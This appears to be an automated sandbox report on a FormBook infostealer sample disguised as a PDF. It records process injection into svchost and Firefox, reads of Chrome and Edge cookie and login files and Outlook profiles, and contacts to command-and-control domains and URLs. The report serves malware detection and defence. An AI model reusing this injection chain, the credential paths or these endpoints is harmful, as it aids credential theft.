                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtClose: Direct from: 0x76F02B6C
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtSetInformationThread: Direct from: 0x76F02ECCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\upnpcont.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: NULL target: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: NULL target: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\upnpcont.exeThread register set: target process: 8040Jump to behavior
                    Queues an APC in another process (thread injection)
                    Source: C:\Windows\SysWOW64\upnpcont.exeThread APC queued: target process: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 295A008Jump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B33008Jump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037B106 LogonUserW,0_2_0037B106
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343D19
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038411C SendInput,keybd_event,0_2_0038411C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003874BB mouse_event,0_2_003874BB
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe" Jump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeProcess created: C:\Windows\SysWOW64\upnpcont.exe "C:\Windows\SysWOW64\upnpcont.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0037A66C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003871FA
                    Source: 5674656777985-069688574654 pdf.exe, cunila.exe, XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000000.2399203433.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: 5674656777985-069688574654 pdf.exe, cunila.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                    Source: XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000000.2399203433.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: XzXxPWzavnqD.exe, 00000009.00000000.2221563326.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083677425.0000000001711000.00000002.00000001.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000000.2399203433.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003665C4 cpuid 0_2_003665C4
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0039091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0039091D
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003BB340 GetUserNameW,0_2_003BB340
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00371E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00371E8E
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0035DDC0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\upnpcont.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                    Source: cunila.exeBinary or memory string: WIN_81
                    Source: cunila.exeBinary or memory string: WIN_XP
                    Source: cunila.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                    Source: cunila.exeBinary or memory string: WIN_XPe
                    Source: cunila.exeBinary or memory string: WIN_VISTA
                    Source: cunila.exeBinary or memory string: WIN_7
                    Source: cunila.exeBinary or memory string: WIN_8

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00398C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00398C4F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0039923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0039923B
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D38C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00D38C4F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D3923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00D3923B

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		3
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		4
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		NTDS117
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		LSA Secrets251
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                    Process Injection                    		1
                    Masquerading                    		Cached Domain Credentials2
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558148 Sample: 5674656777985-069688574654 ... Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 44 www.vpnto.net 2->44 46 www.sitioseguro.blog 2->46 48 5 other IPs or domains 2->48 68 Suricata IDS alerts for network traffic 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 Yara detected FormBook 2->72 74 5 other signatures 2->74 11 5674656777985-069688574654 pdf.exe 4 2->11         started        15 wscript.exe 1 2->15         started        signatures3 process4 file5 42 C:\Users\user\AppData\Local\...\cunila.exe, PE32 11->42 dropped 80 Binary is likely a compiled AutoIt script file 11->80 17 cunila.exe 2 11->17         started        82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->82 21 cunila.exe 1 15->21         started        signatures6 process7 file8 40 C:\Users\user\AppData\Roaming\...\cunila.vbs, data 17->40 dropped 56 Multi AV Scanner detection for dropped file 17->56 58 Binary is likely a compiled AutoIt script file 17->58 60 Machine Learning detection for dropped file 17->60 66 2 other signatures 17->66 23 svchost.exe 17->23         started        62 Writes to foreign memory regions 21->62 64 Maps a DLL or memory area into another process 21->64 26 svchost.exe 21->26         started        signatures9 process10 signatures11 78 Maps a DLL or memory area into another process 23->78 28 XzXxPWzavnqD.exe 23->28 injected process12 signatures13 84 Found direct / indirect Syscall (likely to bypass EDR) 28->84 31 upnpcont.exe 13 28->31         started        process14 signatures15 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 31->88 90 Modifies the context of a thread in another process (thread injection) 31->90 92 3 other signatures 31->92 34 XzXxPWzavnqD.exe 31->34 injected 38 firefox.exe 31->38         started        process16 dnsIp17 50 www.moumore.top 203.161.46.205, 49961, 49973, 49985 VNPT-AS-VNVNPTCorpVN Malaysia 34->50 52 carsten.studio 217.160.0.200, 49890, 49903, 49914 ONEANDONE-ASBrauerstrasse48DE Germany 34->52 54 3 other IPs or domains 34->54 76 Found direct / indirect Syscall (likely to bypass EDR) 34->76 signatures18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    5674656777985-069688574654 pdf.exe76%ReversingLabsWin32.Trojan.AutoitInject
                    5674656777985-069688574654 pdf.exe56%VirustotalBrowse
                    5674656777985-069688574654 pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\retrofit\cunila.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\retrofit\cunila.exe76%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    carsten.studio1%VirustotalBrowse
                    www.vpnto.net0%VirustotalBrowse
                    tempatmudisini06.click3%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.sitioseguro.blog0%Avira URL Cloudsafe
                    http://www.vpnto.net/s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d0%Avira URL Cloudsafe
                    http://www.sitioseguro.blog/6o0x/0%Avira URL Cloudsafe
                    http://www.carsten.studio/bdk6/0%Avira URL Cloudsafe
                    http://www.moumore.top/cdzk/0%Avira URL Cloudsafe
                    http://www.tempatmudisini06.click/5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8=0%Avira URL Cloudsafe
                    http://www.carsten.studio/bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d0%Avira URL Cloudsafe
                    http://www.moumore.top/cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d0%Avira URL Cloudsafe
                    http://www.vpnto.net/s8dp/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    www.moumore.top
                    		203.161.46.205
                    		truetrue
                      		unknown
                      carsten.studio
                      		217.160.0.200
                      		truetrueunknown
                      www.vpnto.net
                      		91.226.30.3
                      		truetrueunknown
                      tempatmudisini06.click
                      		103.21.221.4
                      		truefalseunknown
                      www.sitioseguro.blog
                      		104.21.15.100
                      		truetrue
                        		unknown
                        www.tempatmudisini06.click
                        		unknown
                        		unknownfalse
                          		unknown
                          www.carsten.studio
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.carsten.studio/bdk6/true
                            • Avira URL Cloud: safe
                            		unknown
